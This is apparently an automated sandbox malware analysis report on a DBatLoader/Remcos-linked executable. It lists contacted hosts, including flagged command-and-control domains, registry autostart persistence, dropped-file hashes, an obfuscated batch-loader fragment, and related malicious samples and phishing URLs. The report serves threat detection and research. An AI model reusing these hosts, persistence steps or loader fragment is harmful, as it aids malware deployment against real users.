http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://alfanar01-my.sharepoint.com/personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1Z | jlPBMMQbXC.exe, 00000000.00000003.1491122017.00000000007E7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://alfanar01-my.sharepoint.com/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlK | jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9F7000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000DA69000.00000004.00001000.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://hydros.8k.com | jlPBMMQbXC.exe, Selebzih.PIF.7.dr | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | SndVol.exe, colorcpl.exe | false | - | high
http://geoplugin.net/json.gp/C | SndVol.exe, 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp | false | - | high
https://alfanar01-my.sharepoint.com/ | jlPBMMQbXC.exe, 00000000.00000003.1491122017.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1575706420.00000000007CB000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://spo.nel.measure.office.net/api/report?tenantId=91742063-fccc-4cba-b34b-69be54e484e8&desusert | jlPBMMQbXC.exe, 00000000.00000003.1491083792.000000000083E000.00000004.00000020.00020000.00000000.sdmp | false
                                            high
                                            http://www.pmail.comjlPBMMQbXC.exe, jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1638986421.000000007FB20000.00000004.00001000.00020000.00000000.sdmpfalse
                                              high
                                              https://alfanar01-my.sharepoint.com:443/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQjlPBMMQbXC.exe, 00000000.00000002.1575706420.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1491122017.00000000007E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://ocsp.sectigo.com0CjlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                high
                                                https://lightstone.ae/jlPBMMQbXC.exe, 00000000.00000002.1575706420.0000000000834000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
13.107.136.10 | dual-spo-0005.spo-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
162.19.139.102 | lightstone.ae | United States | 209 | CENTURYLINK-US-LEGACY-QWESTUS | true
103.186.117.159 | pentester0.accesscam.org | unknown | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | true
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1562864
                                                Start date and time:2024-11-26 08:11:11 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 11m 35s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes:19
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:jlPBMMQbXC.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:0225dcd9b2e37389e781d34d3027a1882ada68b4282089105bc637f4d8139561.exe
                                                Detection:MAL
                                                Classification:mal100.rans.troj.spyw.expl.evad.winEXE@18/8@14/3
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 73
                                                • Number of non-executed functions: 239
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, 189749-ipv4v6e.farm.dprodmgd104.sharepointonline.com.akadns.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtOpenFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: jlPBMMQbXC.exe
Time | Type | Description
02:12:09 | API Interceptor | 2x Sleep call for process: jlPBMMQbXC.exe modified
02:12:38 | API Interceptor | 2x Sleep call for process: Selebzih.PIF modified
02:13:05 | API Interceptor | 3359673x Sleep call for process: SndVol.exe modified
07:12:28 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Selebzih C:\Users\Public\Selebzih.url
07:12:37 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Selebzih C:\Users\Public\Selebzih.url
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
13.107.136.10 | http://algestconsulting20-my.sharepoint.com/:f:/g/personal/jacques_cangah_algest-consulting_com/EkolIGllKGRKhe-gd4i73uMBzF46oqcv00d-WXGnz9D-Fw | Get hash | malicious | Unknown | Browse
• algestconsulting20-my.sharepoint.com/:f:/g/personal/jacques_cangah_algest-consulting_com/EkolIGllKGRKhe-gd4i73uMBzF46oqcv00d-WXGnz9D-Fw
13.107.136.10 | http://bombeirosamora-my.sharepoint.com/:o:/g/personal/geral_comando_bombeirosamora_pt/EqT53jeWO6ZGkv1O_1FowosB2CSGfrKDmTZiEPPt31Ds7g | Get hash | malicious | HTMLPhisher | Browse
• bombeirosamora-my.sharepoint.com/:o:/g/personal/geral_comando_bombeirosamora_pt/EqT53jeWO6ZGkv1O_1FowosB2CSGfrKDmTZiEPPt31Ds7g
13.107.136.10 | http://midlandlangarsevasociety-my.sharepoint.com/:w:/g/personal/sharon_bharaj_mlss_org_uk/EWiGFFYhPhtPjz5jsZdcRooBPGLh-q5SsgwgIhmP7JCmAg | Get hash | malicious | HTMLPhisher | Browse
• midlandlangarsevasociety-my.sharepoint.com/:w:/g/personal/sharon_bharaj_mlss_org_uk/EWiGFFYhPhtPjz5jsZdcRooBPGLh-q5SsgwgIhmP7JCmAg
103.186.117.159 | kJRELa7CL3.exe | Get hash | malicious | DBatLoader, Remcos | Browse
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
honeypotresearchteam.duckdns.org | nWiLCvdU0P.exe | Get hash | malicious | DBatLoader, Remcos | Browse
• 178.162.204.238
pentester0.accesscam.org | kJRELa7CL3.exe | Get hash | malicious | DBatLoader, Remcos | Browse
• 103.186.117.159
pentester0.accesscam.org | nWiLCvdU0P.exe | Get hash | malicious | DBatLoader, Remcos | Browse
• 178.162.204.238
pentester0.accesscam.org | p7c0yHVLB6.exe | Get hash | malicious | Remcos | Browse
• 141.95.136.82
pentester0.accesscam.org | rRhJnzhWEd.exe | Get hash | malicious | DBatLoader, Remcos | Browse
• 51.178.112.40
pentester0.accesscam.org | BOQ-Al Gurg Automation Project.exe | Get hash | malicious | DBatLoader, Remcos | Browse
• 51.178.112.40
pentester0.accesscam.org | BOQ-Al Gurg Automation Project.exe | Get hash | malicious | DBatLoader, Remcos | Browse
• 51.178.112.40
pentester0.accesscam.org | file.exe | Get hash | malicious | DBatLoader, Remcos | Browse
• 57.128.132.196
pentester0.accesscam.org | arch-sketch-002993.dwg.pif.exe | Get hash | malicious | DBatLoader, Remcos | Browse
• 151.80.223.229
pentester0.accesscam.org | Drawing.exe | Get hash | malicious | DBatLoader, Remcos | Browse
• 151.80.223.229
pentester0.accesscam.org | BOQ-523-2022 R01.pdf.exe | Get hash | malicious | DBatLoader, Remcos | Browse
• 151.80.223.229
dual-spo-0005.spo-msedge.net | https://tmacog-my.sharepoint.com/:f:/g/personal/bechsteinm_tmacog_org/EhlK4Xsd02RCkKBp5naSkjkBOE0y5JIGJchJIGq_xqq50Q?e=5%3abaznzS&at=9&xsdata=MDV8MDJ8Ymhvb3BlckBiZ3N1LmVkdXwxYTg0MTFlMjdjMzQ0NWU4MTcwZjA4ZGQwZDZiOGQzM3xjZGNiNzI5ZDUxMDY0ZDdjYjc1YmEzMGM0NTVkNWIwYXwwfDB8NjM4NjgxNDc3ODAwNDk3OTg2fFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=VldHeThDNE1GNDFhUVA3VUJFZzEwL2JHVDN6U1BIcVM3bzE4cklKOGVJbz0%3d&clickparams=eyAiWC1BcHBOYW1lIiA6ICJNaWNyb3NvZnQgT3V0bG9vayIsICJYLUFwcFZlcnNpb24iIDogIjE2LjAuMTczMjguMjA2MTIiLCAiT1MiIDogIldpbmRvd3MiIH0%3D | Get hash | malicious | HTMLPhisher | Browse
• 13.107.136.10
dual-spo-0005.spo-msedge.net | https://ymcajeffco-my.sharepoint.com/:u:/g/personal/rcampbell_mtvernonymca_org/Eb_PxgSrk7VCrlppYfmkXowB9vCdCR2cgdVG8AQkH7BcbQ?e=b9efJ2 | Get hash | malicious | HTMLPhisher | Browse
• 13.107.136.10
dual-spo-0005.spo-msedge.net | Quote Request.eml | Get hash | malicious | HTMLPhisher | Browse
• 13.107.136.10
dual-spo-0005.spo-msedge.net | https://cabinetstogollc-my.sharepoint.com/:b:/g/personal/store802_cabinetstogo_com/EYepBlB4QExJsG0U-4jKG4ABoZxLg7rdp0_zjjwabbUc1g?e=q4iRIE&com.microsoft.intune.mam.appmdmmgtstate=2&com.microsoft.intune.mam.policysource=2&com.microsoft.intune.mam.identity=mcle%40novozymes.com&com.microsoft.intune.mam.policy=1&com.micro | Get hash | malicious | Unknown | Browse
• 13.107.136.10
dual-spo-0005.spo-msedge.net | https://binusianorg-my.sharepoint.com/personal/radja_hizbullah_binus_ac_id/_layouts/15/guestaccess.aspx?share=ETHY_S_rOwNFgVsgBzxZDRgB0fQxIDkLS5qX9M9nLivRaw&e=mq1rkf | Get hash | malicious | Unknown | Browse
• 13.107.136.10
dual-spo-0005.spo-msedge.net | https://tractopieces35-my.sharepoint.com/:o:/g/personal/lecomte22_tracto-pieces_fr/EqM9FMd6batFtzMgdv1f2XUBmLAJecWys730N_AOVrXnXA?e=3TLKO8 | Get hash | malicious | Unknown | Browse
• 13.107.136.10
dual-spo-0005.spo-msedge.net | https://linklock.titanhq.com/analyse?url=https%3A%2F%2Fmyarrowleaf1-my.sharepoint.com%2F%3Af%3A%2Fg%2Fpersonal%2Fmarge_penrod_myarrowleaf_org%2FElQV40bjfBZKivPSKIPxGuYBa20TAVuQG9ya4YrQRKjHiQ%3Fe%3D7nML8f&data=eJxVzctugzAQBdCvMbtGBqOkWXhBlOYhUiW0VaR0gyZgGyL80Ng05e8L6aaVZlZz7p2Kz5PlPI1BxBQqFtW8qkF14P2ssjrSfEEPxukjHONsHXlusRboSUrN_aG0VA-IPFyxVU0QOB7_dfS8CcF5wjKSbMbRAyDaeydAxk96mPkGUDjbmjDxybBM_mo1rhv_WQPdlARUonTCoK3LPzWlxUm-dMU5pdebXH3m7dfpPd-fvrf9ZQUJ_cjOfbFdDpBesHjLb7u2IGwjCFsvzOvhWf4A0NhYxQ%25%25 | Get hash | malicious | Unknown | Browse
• 13.107.136.10
dual-spo-0005.spo-msedge.net | FW Cardenas Leslie shared Mathis IDS Remittance Copy with you.msg | Get hash | malicious | Unknown | Browse
• 13.107.136.10
dual-spo-0005.spo-msedge.net | Malicious PDF.pdf | Get hash | malicious | Unknown | Browse
• 13.107.136.10
dual-spo-0005.spo-msedge.net | https://progressiverealtypartners-my.sharepoint.com/:u:/g/personal/tim_prpmgmt_com/EdZinr2CPWZEuxpjzT68pWkB_BXb703gHPyGyIw4BgsN9Q?e=R4oSZ5 | Get hash | malicious | Unknown | Browse
• 13.107.136.10
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CENTURYLINK-US-LEGACY-QWESTUS | fbot.m68k.elf | Get hash | malicious | Mirai, Moobot | Browse
• 208.45.0.29
CENTURYLINK-US-LEGACY-QWESTUS | fbot.ppc.elf | Get hash | malicious | Mirai, Moobot | Browse
• 71.32.39.76
CENTURYLINK-US-LEGACY-QWESTUS | fbot.mips.elf | Get hash | malicious | Mirai, Moobot | Browse
• 209.26.46.107
CENTURYLINK-US-LEGACY-QWESTUS | fbot.arm.elf | Get hash | malicious | Mirai, Moobot | Browse
• 67.144.93.84
CENTURYLINK-US-LEGACY-QWESTUS | la.bot.arm7.elf | Get hash | malicious | Unknown | Browse
• 63.229.122.202
CENTURYLINK-US-LEGACY-QWESTUS | la.bot.mipsel.elf | Get hash | malicious | Unknown | Browse
• 97.117.89.67
CENTURYLINK-US-LEGACY-QWESTUS | la.bot.mips.elf | Get hash | malicious | Unknown | Browse
• 71.218.36.20
CENTURYLINK-US-LEGACY-QWESTUS | loligang.mpsl.elf | Get hash | malicious | Mirai | Browse
• 167.76.6.254
CENTURYLINK-US-LEGACY-QWESTUS | arm7.nn.elf | Get hash | malicious | Mirai, Okiru | Browse
• 184.1.180.119
CENTURYLINK-US-LEGACY-QWESTUS | powerpc.nn.elf | Get hash | malicious | Mirai, Okiru | Browse
• 76.7.176.213
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | fbot.spc.elf | Get hash | malicious | Mirai, Moobot | Browse
• 103.33.85.33
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | la.bot.m68k.elf | Get hash | malicious | Unknown | Browse
• 103.163.8.163
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | la.bot.mips.elf | Get hash | malicious | Unknown | Browse
• 138.46.245.63
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | apep.arm6.elf | Get hash | malicious | Mirai | Browse
• 103.172.4.105
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | sparc.nn.elf | Get hash | malicious | Mirai, Okiru | Browse
• 130.222.69.184
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23YWhvd2FyZEBzZWN1cnVzdGVjaG5vbG9naWVzLmNvbQ== | Get hash | malicious | Unknown | Browse
• 103.174.152.66
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23cnlhbi5lZHdhcmRzQGF2ZW50aXYuY29t | Get hash | malicious | Unknown | Browse
• 103.174.152.66
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23bWJsYW5kQHNlY3VydXN0ZWNobm9sb2dpZXMuY29t | Get hash | malicious | Unknown | Browse
• 103.174.152.66
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | x86.elf | Get hash | malicious | Mirai, Moobot | Browse
• 103.186.137.204
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | spc.elf | Get hash | malicious | Mirai | Browse
• 103.0.31.214
MICROSOFT-CORP-MSN-AS-BLOCKUS | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse
• 204.79.197.203
MICROSOFT-CORP-MSN-AS-BLOCKUS | file.exe | Get hash | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | Browse
• 23.101.168.44
MICROSOFT-CORP-MSN-AS-BLOCKUS | file.exe | Get hash | malicious | LummaC Stealer | Browse
• 13.107.246.63
MICROSOFT-CORP-MSN-AS-BLOCKUS | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse
• 20.75.60.91
MICROSOFT-CORP-MSN-AS-BLOCKUS | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse
• 94.245.104.56
MICROSOFT-CORP-MSN-AS-BLOCKUS | FW Expiration Pending Support Care HIPAA Acknowledgement Form 2024.eml | Get hash | malicious | Unknown | Browse
• 52.109.76.243
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://app.useblocks.io/getemail/48034?secret_hash=d1541dc5be135b2d0f39c0711cecbe46&raw=true | Get hash | malicious | EvilProxy, HTMLPhisher | Browse
• 13.107.246.63
MICROSOFT-CORP-MSN-AS-BLOCKUS | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse
• 51.104.15.253
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://docs.google.com/drawings/d/1rnJTD83ySW2kuilnF4J1ffAp0B5BM7BM0Nvi8F8BbSI/preview?pli=1HeatherMitchell-andrew.tokar@overlakehospital.org | Get hash | malicious | HTMLPhisher | Browse
• 52.98.61.50
MICROSOFT-CORP-MSN-AS-BLOCKUS | fbot.sh4.elf | Get hash | malicious | Mirai, Moobot | Browse
• 13.107.240.53
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
a0e9f5d64349fb13191bc781f81f42e1 | nft438A5fN.exe | Get hash | malicious | DBatLoader, Remcos | Browse
• 13.107.136.10
• 162.19.139.102
a0e9f5d64349fb13191bc781f81f42e1 | 6BE4RDldhw.exe | Get hash | malicious | DBatLoader | Browse
• 13.107.136.10
• 162.19.139.102
a0e9f5d64349fb13191bc781f81f42e1 | AnyDesk.exe | Get hash | malicious | DBatLoader | Browse
• 13.107.136.10
• 162.19.139.102
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | Unknown | Browse
• 13.107.136.10
• 162.19.139.102
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | Unknown | Browse
• 13.107.136.10
• 162.19.139.102
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | Browse
• 13.107.136.10
• 162.19.139.102
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | LummaC Stealer | Browse
• 13.107.136.10
• 162.19.139.102
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | LummaC Stealer | Browse
• 13.107.136.10
• 162.19.139.102
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | Unknown | Browse
• 13.107.136.10
• 162.19.139.102
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | Unknown | Browse
• 13.107.136.10
• 162.19.139.102
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\Public\alpha.pif | nft438A5fN.exe | Get hash | malicious | DBatLoader, Remcos | Browse
C:\Users\Public\alpha.pif | RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat | Get hash | malicious | AgentTesla, DBatLoader | Browse
C:\Users\Public\alpha.pif | IBKB.vbs | Get hash | malicious | AgentTesla, DBatLoader, PureLog Stealer | Browse
C:\Users\Public\alpha.pif | USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe | Get hash | malicious | Remcos, DBatLoader | Browse
C:\Users\Public\alpha.pif | USD470900_COPY_800BLHSBC882001.PDF.bat | Get hash | malicious | Remcos, DBatLoader | Browse
C:\Users\Public\alpha.pif | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | Get hash | malicious | AgentTesla, DBatLoader, PureLog Stealer | Browse
C:\Users\Public\alpha.pif | Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd | Get hash | malicious | AgentTesla, DBatLoader, PureLog Stealer | Browse
C:\Users\Public\alpha.pif | Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd | Get hash | malicious | AgentTesla, DBatLoader | Browse
C:\Users\Public\alpha.pif | x.exe | Get hash | malicious | AgentTesla, DBatLoader | Browse
C:\Users\Public\alpha.pif | TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd | Get hash | malicious | AgentTesla, DBatLoader | Browse
                                                                      Process:C:\Users\user\Desktop\jlPBMMQbXC.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4
                                                                      Entropy (8bit):2.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:pvn:Bn
                                                                      MD5:778300BD8587672716B777C1C3F07C14
                                                                      SHA1:EF2781BBE133C16ADB6600F5D01C3683F584384E
                                                                      SHA-256:CC40D093B4B0AA5F9CE40061B3489183AAB268DA0BE0400DEE53E5A6480D9346
                                                                      SHA-512:265A83B0F14B57BA28203DDF96115EE404C34AC3DAF8CBA31E38B63DAEB31A84454B21B215AD603CA0EF424FAA11E1D003BC3F1510639A73A01929121513C2F0
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:29..
                                                                      Process:C:\Users\user\Desktop\jlPBMMQbXC.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):804168
                                                                      Entropy (8bit):7.389101892224455
                                                                      Encrypted:false
                                                                      SSDEEP:12288:ih27Kvc3GnLrlkBBBm4UVSZeKYnijQySTMXm5pJO88b8NyUV/HxNnrpEGOFz9cWj:N77YdqBaVdTijQzTQ0i87NfVhIFBe+Z
                                                                      MD5:6D48D5B4A6E4DFA2497101012016CF64
                                                                      SHA1:06BB4C483D284976FB2CCC76DE8EF1B44D1F0D8F
                                                                      SHA-256:C348DAD4A637ED1784B5A1156FFBECE2A09419010DF7E63FEBF7B098838EAFF4
                                                                      SHA-512:001ECBA09C2B465106C0A5CD35E8D54B39102171EDB01603FD2D664D24790B3B1C65BC9E1E03F993992697D9F1AE021FCCFF60581868B3753108CA59F55854AD
                                                                      Malicious:true
                                                                      Preview:...Y#..K. .%..'..!'...%...........&#$......".'............'..... .... ..%.&.....%......!..'.'......Y#..K.....'..!.....Y#..K.....................................................................................................................................................................................................................................................................................................................................................................................................................................................B...0"+.@...<"................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):1243648
                                                                      Entropy (8bit):7.222099898338502
                                                                      Encrypted:false
                                                                      SSDEEP:24576:HZVgZqK0ycvp/WLq7frG1Pjc8sfe93uhoKg97y4zuaRacKHT7:Hri0HvELqW1PjKK3cg9XzuaReX
                                                                      MD5:A27B6DE588AD4D4C0D6E0C656E580F4E
                                                                      SHA1:48D25BBC2E65BD22678CA45D2B53B4CA8CE8059F
                                                                      SHA-256:0225DCD9B2E37389E781D34D3027A1882ADA68B4282089105BC637F4D8139561
                                                                      SHA-512:C877CB2B51DBF234C5BCA14F520D8BD42D8D5690E2F4F3D9AC07700E190FDBBBD4B52A6B0D1B71284F0B277F625D6B60F8F3B086ADE1E7F7FC4347CF6AF6E6DF
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................................... ....@..............................................@........................... ...%...........................p...k...........................`.......................'...............................text............................... ..`.itext..L........................... ..`.data....... ......................@....bss.....6...............................idata...%... ...&..................@....tls....4....P...........................rdata.......`......................@..@.reloc...k...p...l..................@..B.rsrc................P..............@..@....................................@..@................................................................................................
                                                                      Process:C:\Users\user\Desktop\jlPBMMQbXC.exe
                                                                      File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):62357
                                                                      Entropy (8bit):4.705712327109906
                                                                      Encrypted:false
                                                                      SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                      MD5:B87F096CBC25570329E2BB59FEE57580
                                                                      SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                      SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                      SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                      Malicious:false
                                                                      Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .
                                                                      Process:C:\Users\user\Desktop\jlPBMMQbXC.exe
                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Selebzih.PIF">), ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):104
                                                                      Entropy (8bit):5.086136146513478
